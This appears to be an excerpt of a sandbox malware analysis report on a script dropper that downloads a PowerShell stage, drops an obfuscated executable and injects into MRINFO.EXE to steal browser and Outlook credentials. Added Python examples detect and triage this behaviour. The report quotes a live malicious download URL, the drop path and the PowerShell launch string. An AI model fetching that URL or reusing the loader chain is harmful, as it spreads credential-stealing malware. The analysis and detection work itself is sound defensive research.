                Source: C:\Windows\SysWOW64\MRINFO.EXE | Sections loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
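Taken together, the MRINFO.EXE records tell the credential-theft story behind the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures: a multicast-routing diagnostic tool loads winsqlite3.dll, vaultcli.dll and dpapi.dll, opens the Outlook profile key, and has the schema of the password_notes table of Chromium's Login Data database in memory. The following added example (not Joe Sandbox's logic) scores those three signal types per process so that the combination, not any single DLL load, drives the alert. The events are constructed from the report; the allowlist of processes expected to touch credential stores and the point values are assumptions to tune per environment.

```python
"""Score credential-access behaviour in a process with no business touching
credential stores.

Added example, not Joe Sandbox's logic. Signals: loads of credential-related
DLLs, an Outlook profile registry path being opened, and browser credential
database schema text found in process memory. Allowlist and points are assumptions.
"""
import re

CRED_DLLS = {  # dll -> (why it matters, points)
    "vaultcli.dll": ("Windows Vault / Credential Manager API", 2),
    "dpapi.dll": ("DPAPI CryptUnprotectData, needed to decrypt saved browser passwords", 2),
    "winsqlite3.dll": ("SQLite reader, used on browser Login Data / cookies databases", 2),
}
OUTLOOK_PROFILES_RE = re.compile(r"\\Software\\Microsoft\\Office\\[\d.]+\\Outlook\\Profiles", re.I)
BROWSER_SCHEMA_RE = re.compile(r"CREATE TABLE (logins|password_notes|cookies)\b")
EXPECTED_TO_TOUCH_STORES = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}  # assumption
THRESHOLD = 4


def score_process(image, modules=(), reg_keys=(), mem_strings=()):
    """Return a score, a verdict and human-readable reasons for one process."""
    name = image.rsplit("\\", 1)[-1].lower()
    loaded = {m.lower() for m in modules}
    score, reasons = 0, []
    for dll, (why, pts) in CRED_DLLS.items():
        if dll in loaded:
            score += pts
            reasons.append(f"loads {dll}: {why}")
    if {"winsqlite3.dll", "dpapi.dll"} <= loaded:
        score += 2
        reasons.append("sqlite + DPAPI together: browser password decryption pattern")
    for key in reg_keys:
        if OUTLOOK_PROFILES_RE.search(key):
            score += 3
            reasons.append(f"opens Outlook profile store: {key}")
    for s in mem_strings:
        m = BROWSER_SCHEMA_RE.search(s)
        if m:
            score += 3
            reasons.append(f"browser credential DB schema in memory: {m.group(0)}")
            break
    flagged = score >= THRESHOLD and name not in EXPECTED_TO_TOUCH_STORES
    return {"image": name, "score": score, "flagged": flagged, "reasons": reasons}


def flagged_processes(events):
    return [r["image"] for r in (score_process(**e) for e in events) if r["flagged"]]


# Constructed from the report's MRINFO.EXE records.
MRINFO = {
    "image": r"C:\Windows\SysWOW64\MRINFO.EXE",
    "modules": ["wininet.dll", "winhttp.dll", "winsqlite3.dll", "vaultcli.dll", "dpapi.dll", "cryptbase.dll"],
    "reg_keys": ["HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"],
    "mem_strings": ["CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"],
}
# Constructed benign controls (assumptions, not from the report).
NOTEPAD = {"image": r"C:\Windows\System32\notepad.exe", "modules": ["cryptbase.dll", "uxtheme.dll"]}
OUTLOOK = {
    "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
    "reg_keys": ["HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\"],
}
SAMPLE_EVENTS = [MRINFO, NOTEPAD, OUTLOOK]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        r = score_process(**e)
        print(r["image"], r["score"], r["flagged"], *r["reasons"], sep="\n  ")
```

A static allowlist is the weak point of this kind of rule; in production, key the exception on image path plus signer rather than on the file name, since the report shows the same injected code running from MRINFO.EXE, a signed Microsoft binary whose name alone proves nothing.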
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2107158636.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, MRINFO.EXE, 0000000A.00000002.2990258811.00000000038EE000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2990258811.0000000003750000.00000040.00001000.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2107338460.000000000359C000.00000004.00000020.00020000.00000000.sdmp, MRINFO.EXE, 0000000A.00000003.2104477664.00000000033E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdbGCTL source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mrinfo.pdb source: RegAsm.exe, 00000005.00000002.2104818275.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2988989976.000000000096E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2027775593.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2987654360.00000000003FF000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdb source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZDFS.pdbBSJB source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:292 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22MSXML2.XMLHTTP%22");ITextStream.WriteLine(" exit:307 f:_0x429836 r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:301 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:301 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:319 f:_0x165511 a0:275");ITextStream.WriteLine(" exit:319 f:_0x165511 r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:315 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:315 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:329 f:_0x429836 a0:287");ITextStream.WriteLine(" exec:335 f:_0xe32f");ITextStream.WriteLine(" entry:340 f:_0x3d8f");ITextStream.WriteLine(" exit:340 f:_0x3d8f r:CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:287 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22CreateFolder%22");ITextStream.WriteLine(" exit:329 f:_0x429836 r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:325 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:325 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1289 f:DownloadScript a0:%22http%3A%2F%2F196.251.92.64%2Fcrypt%2Fpopo.ps1%22 a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");ITextStream.WriteLine(" exec:371 f:DownloadScript");ITextStream.WriteLine(" entry:389 f:_0x5e2485 a0:308 a1:%22h*bh%22");ITextStream.WriteLine(" exit:389 f:_0x5e2485 r:%22Open%22");ITextStream.WriteLine(" entry:395 f:_0x5b10a7 a0:282");ITextStream.WriteLine(" exec:335 f:_0xe32f");ITextStream.WriteLine(" entry:340 f:_0x3d8f");ITextStream.WriteLine(" exit:340 f:_0x3d8f r:CreateTextFile%2CPowerShell%20-NoProfile%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");ITextStream.WriteLine(" entry:366 f:_0xe32f a0:282 a1:undefined");ITextStream.WriteLine(" exec:347 f:");ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22GET%22");ITextStream.WriteLine(" exit:395 f:_0x5b10a7 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:385 o: f:Open a0:%22GET%22 a1:%22http%3A%2F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK
                Source: payment1.js | Initial file: High amount of function use 8
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8B0942 | push E95B70D0h; ret | 1_2_00007FFD9B8B09C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004150CE | push ebx; retf | 5_2_004150D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004150B0 | push edx; ret | 5_2_004150B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041897B | push ecx; iretd | 5_2_0041897C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00412993 | push ecx; iretd | 5_2_0041299A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00405AB5 | push ecx; retf | 5_2_00405ABF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004033F0 | push eax; ret | 5_2_004033F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00416BA0 | push eax; retf | 5_2_00416BA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_004194D8 | push esp; iretd | 5_2_004194DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040D492 | push eax; retf | 5_2_0040D493
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0041862C | push C22D13DCh; retf | 5_2_00418634
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_0040D6CC | push es; retf | 5_2_0040D6D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00414E9F | push ebx; retf | 5_2_00414EA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00417763 | push ss; iretd | 5_2_00417743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_00417723 | push ss; iretd | 5_2_00417743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B209AD | push ecx; mov dword ptr [esp], ecx | 5_2_02B209B6
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03272B73 | push ecx; iretd | 9_2_03272B7A
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03278B5B | push ecx; iretd | 9_2_03278B5C
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_032752AE | push ebx; retf | 9_2_032752B1
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03275290 | push edx; ret | 9_2_03275291
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0327793E | push ss; iretd | 9_2_03277923
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03277903 | push ss; iretd | 9_2_03277923
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0327611C | push FFFFFFC3h; iretd | 9_2_0327611E
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0327880C | push C22D13DCh; retf | 9_2_03278814
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0327507F | push ebx; retf | 9_2_03275081
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0326D8AC | push es; retf | 9_2_0326D8B1
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_032760C1 | push edi; iretd | 9_2_032760C2
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03275FB9 | push eax; iretd | 9_2_03275FBA
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_0326D672 | push eax; retf | 9_2_0326D673
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_032796B8 | push esp; iretd | 9_2_032796BD
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe | Code function: 9_2_03276D80 | push eax; retf | 9_2_03276D81
                Source: x.exe.1.dr | Static PE information: section name: .text entropy: 7.946498461797713
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (91 occurrences)
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Process information set: NOOPENFILEERRORBOX (22 occurrences)
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)
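
                The two Anti Malware Scan Interface buffers listed above (the instrumented wscript.exe script trace and the Base64 PE prefix handed to FromBase64String in powershell.exe) already carry the dropper's download URL, drop path and PowerShell launch string, but URL-encoded and interleaved with trace noise. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses the `entry:/exit:/exec:` trace records and the direct COM calls, URL-decodes every field, collects URLs, Windows paths and interpreter command fragments, and decodes the truncated Base64 far enough to confirm the MZ and PE headers. The buffer excerpt is a shortened copy of the capture on this page (the comma-joined string array returned by `_0x3d8f` is kept because it holds the PowerShell command line); the field names and regular expressions are this example's assumptions about the trace format, and a truncated trailing record, like the `Open` call cut off mid-URL on the page, is deliberately ignored rather than guessed at.

```python
import base64
import re
from urllib.parse import unquote

# Constructed excerpt of the wscript.exe AMSI script-trace buffer quoted in this
# report (the page shows a far longer, truncated capture; a handful of its
# instrumented calls are reproduced here verbatim).
AMSI_SCRIPT_TRACE = (
    'ITextStream.WriteLine(" exit:340 f:_0x3d8f r:CreateTextFile%2CPowerShell%20-NoProfile'
    '%20-ExecutionPolicy%20RemoteSigned%20-File%20%2CrM9SzgvYrxHPC3rZ%2CDownload%20failed'
    '%20with%20status%3A%20%2Cnte0mtu4nxrtrejRyG%2CjaK5Emo3iSkUAW%2CW4VdKZ5ZrG%2CWQ0");'
    'ITextStream.WriteLine(" entry:366 f:_0xe32f a0:292 a1:undefined");'
    'ITextStream.WriteLine(" exit:366 f:_0xe32f r:%22MSXML2.XMLHTTP%22");'
    'ITextStream.WriteLine(" entry:301 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");'
    'IHost.CreateObject("MSXML2.XMLHTTP");'
    'IFileSystem3.FolderExists("C:\\Temp");'
    'ITextStream.WriteLine(" exit:315 o: f:FolderExists r:false");'
    'IFileSystem3.CreateFolder("C:\\Temp");'
    'ITextStream.WriteLine(" entry:1289 f:DownloadScript a0:%22http%3A%2F%2F196.251.92.64'
    '%2Fcrypt%2Fpopo.ps1%22 a1:%22C%3A%5CTemp%5Cdddddd.ps1%22");'
)

# Truncated Base64 from the powershell.exe AMSI buffer on this page, verbatim.
AMSI_B64_PREFIX = (
    "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4A"
    "tAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAK"
)

# Trace records look like:  ITextStream.WriteLine(" entry:301 o:... f:Name a0:... a1:...");
TRACE_RE = re.compile(r'ITextStream\.WriteLine\(" (entry|exit|exec):(\d+)([^"]*)"\);')
FIELD_RE = re.compile(r'(\w+):(\S*)')            # key:value pairs, values URL-encoded
COM_CALL_RE = re.compile(r'\b(I[A-Za-z0-9]+)\.(\w+)\(([^)]*)\);')   # IFileSystem3.CreateFolder("...");
URL_RE = re.compile(r'https?://[^\s"\',]+')
WINPATH_RE = re.compile(r'[A-Za-z]:\\[^\s"\',]+')
LOLBIN_RE = re.compile(r'\b(powershell|cmd|wscript|cscript|mshta|rundll32)\b', re.I)


def parse_trace(buffer):
    """Return the instrumented entry/exit/exec records with URL-decoded fields.
    Only complete records (closing '");') are kept, so a truncated tail is dropped."""
    records = []
    for kind, line, rest in TRACE_RE.findall(buffer):
        fields = {k: unquote(v) for k, v in FIELD_RE.findall(rest)}
        records.append({"kind": kind, "line": int(line), "fields": fields})
    return records


def parse_com_calls(buffer):
    """Return (interface, method, [string args]) for each direct COM call,
    skipping the ITextStream.WriteLine records that are the trace itself."""
    calls = []
    for iface, method, argstr in COM_CALL_RE.findall(buffer):
        if (iface, method) == ("ITextStream", "WriteLine"):
            continue
        calls.append((iface, method, re.findall(r'"([^"]*)"', argstr)))
    return calls


def extract_iocs(buffer):
    """Collect URLs, Windows paths and interpreter launch strings from both the
    decoded trace fields and the literal COM call arguments."""
    texts = []
    for rec in parse_trace(buffer):
        texts.extend(rec["fields"].values())
    for _, _, args in parse_com_calls(buffer):
        texts.extend(args)
    urls, paths, commands = set(), set(), set()
    for text in texts:
        urls.update(URL_RE.findall(text))
        paths.update(WINPATH_RE.findall(text))
        # the obfuscated script keeps its strings in one comma-joined array;
        # the interpreter launch string sits in it as a plain entry
        for piece in text.split(","):
            if LOLBIN_RE.search(piece):
                commands.add(piece.strip())
    return {"urls": sorted(urls), "paths": sorted(paths), "commands": sorted(commands)}


def decode_pe_prefix(b64):
    """Decode a truncated Base64 blob; the incomplete final quantum is dropped."""
    usable = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(usable)


def pe_header_summary(blob):
    """Return e_lfanew, machine and section count if the blob starts a PE image."""
    if blob[:2] != b"MZ" or len(blob) < 0x40:
        return None
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    if blob[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = int.from_bytes(blob[e_lfanew + 4:e_lfanew + 6], "little")
    sections = int.from_bytes(blob[e_lfanew + 6:e_lfanew + 8], "little")
    return {"e_lfanew": e_lfanew, "machine": machine, "sections": sections}


if __name__ == "__main__":
    print(extract_iocs(AMSI_SCRIPT_TRACE))
    for call in parse_com_calls(AMSI_SCRIPT_TRACE):
        print(call)
    print(pe_header_summary(decode_pe_prefix(AMSI_B64_PREFIX)))
```

                Run against the excerpt, `extract_iocs` yields the download URL `http://196.251.92.64/crypt/popo.ps1`, the drop paths `C:\Temp` and `C:\Temp\dddddd.ps1`, and the launch string `PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File`, which together describe the chain the report's signatures summarise (wscript.exe to MSXML2.XMLHTTP download to a .ps1 under C:\Temp to powershell.exe). The Base64 prefix decodes to an `MZ` header whose `e_lfanew` points at a `PE\0\0` signature with machine 0x14C (i386), consistent with the 32-bit x.exe the PowerShell stage drops.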

                Malware Analysis System Evasion
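
                The `push ...; ret/retf/iretd` sequences listed under Data Obfuscation above, the .text entropy of 7.95 on the dropped x.exe, and the `rdtsc` and `mov eax/ecx, dword ptr fs:[00000030h]` reads listed in this section are all constructs that can be found statically in a dumped section before anything is run. The following Python scanner is an added example, not code from the report or from the sample: it encodes those constructs as 32-bit x86 byte patterns, recovers the push target (the address a `push imm; ret` transfers control to) and computes Shannon entropy with the kind of threshold the report's entropy signature applies. The sample buffer is hand-assembled from the instructions quoted in this report, padded with NOPs; the 7.2 threshold is this example's assumption.

```python
import math
import re
import struct
from collections import Counter

# 32-bit x86 byte patterns for the constructs this report lists: push/ret-style
# control transfers, rdtsc timing checks and fs:[30h] PEB reads.
PATTERNS = {
    "push imm32; ret/retf":         re.compile(rb"\x68(....)[\xC3\xCB]", re.DOTALL),
    "push imm8; iretd":             re.compile(rb"\x6A(.)\xCF", re.DOTALL),
    "push r32; ret/retf/iretd":     re.compile(rb"[\x50-\x57][\xC3\xCB\xCF]"),
    "push es/cs/ss/ds; retf/iretd": re.compile(rb"[\x06\x0E\x16\x1E][\xCB\xCF]"),
    "rdtsc":                        re.compile(rb"\x0F\x31"),
    "mov eax, fs:[30h] (PEB)":      re.compile(rb"\x64(?:\xA1|\x8B\x05)\x30\x00\x00\x00"),
    "mov ecx, fs:[30h] (PEB)":      re.compile(rb"\x64\x8B\x0D\x30\x00\x00\x00"),
}

# Constructed sample: the instructions quoted in this report, assembled by hand
# and padded with NOPs. These are not bytes taken from the analysed binaries.
SAMPLE = (
    b"\x90" * 4
    + b"\x68\xD0\x70\x5B\xE9\xC3"        # push E95B70D0h; ret
    + b"\x90" * 3
    + b"\x53\xCB"                        # push ebx; retf
    + b"\x0F\x31"                        # rdtsc
    + b"\x64\xA1\x30\x00\x00\x00"        # mov eax, dword ptr fs:[30h]
    + b"\x6A\xC3\xCF"                    # push FFFFFFC3h; iretd (imm8, sign-extended)
    + b"\x06\xCB"                        # push es; retf
    + b"\x64\x8B\x0D\x30\x00\x00\x00"    # mov ecx, dword ptr fs:[30h]
)


def scan_indicators(code, base=0):
    """Return every pattern hit as {offset, indicator[, target]}, ordered by offset.
    For push imm; ret the target is the address control is transferred to."""
    hits = []
    for name, pat in PATTERNS.items():
        for m in pat.finditer(code):
            hit = {"offset": base + m.start(), "indicator": name}
            if name.startswith("push imm32"):
                hit["target"] = struct.unpack("<I", m.group(1))[0]
            elif name.startswith("push imm8"):
                # push imm8 sign-extends to 32 bits before pushing
                hit["target"] = struct.unpack("<b", m.group(1))[0] & 0xFFFFFFFF
            hits.append(hit)
    return sorted(hits, key=lambda h: h["offset"])


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_packed(entropy, threshold=7.2):
    """Heuristic threshold (assumed here); the report flags x.exe .text at 7.946."""
    return entropy >= threshold


if __name__ == "__main__":
    for h in scan_indicators(SAMPLE, base=0x00400000):
        print(h)
    e = shannon_entropy(SAMPLE)
    print("entropy", round(e, 3), "packed?", looks_packed(e))
```

                Byte-pattern matches also fire on data bytes and on the tails of longer instructions, which is why the report's own list of push/ret sites is noisy (note the same instruction address 5_2_00417743 attributed to two different functions); treat the hit count per section as a triage signal and confirm individual hits in a disassembler. The fs:[30h] reads are how 32-bit code reaches the PEB directly, where BeingDebugged sits at offset 2 and NtGlobalFlag at offset 0x68, without calling IsDebuggerPresent; paired with `rdtsc` timing and the DebugPort queries listed below, they form the debugger-detection side of the evasion signatures.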

                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\MRINFO.EXE | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: 2150000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: 22E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: 42E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 5_2_02B9D1C0 | rdtsc | 5_2_02B9D1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
